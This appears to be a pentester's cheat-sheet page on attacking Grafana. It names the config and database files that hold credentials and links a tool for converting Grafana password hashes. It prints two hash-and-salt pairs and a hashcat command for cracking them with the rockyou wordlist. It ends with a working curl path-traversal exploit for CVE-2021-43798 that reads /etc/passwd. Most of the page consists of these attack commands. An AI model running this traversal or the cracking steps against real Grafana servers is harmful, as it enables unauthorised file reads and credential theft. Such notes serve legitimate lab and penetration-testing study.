Grafana

Useful files

/etc/grafana/grafana.in
/var/lib/grafana/grafana.db

Converting Grafana hashes to Haschat

https://github.com/iamaldi/grafana2hashcat/blob/main/README.md

We have to grab in a file the hash,salt

7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

Then use this file with the tool

Then I can use hashcat to crack those hashes:

hashcat -m 10900 hashcat_hashes.txt --wordlist /usr/share/wordlists/rockyou.txt

CVE-2021-43798

Grafana 8.x Path Traversal (Pre-Auth)

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

PreviousDatabase Analysis NextFILE TRANSFERS

Last updated 16 days ago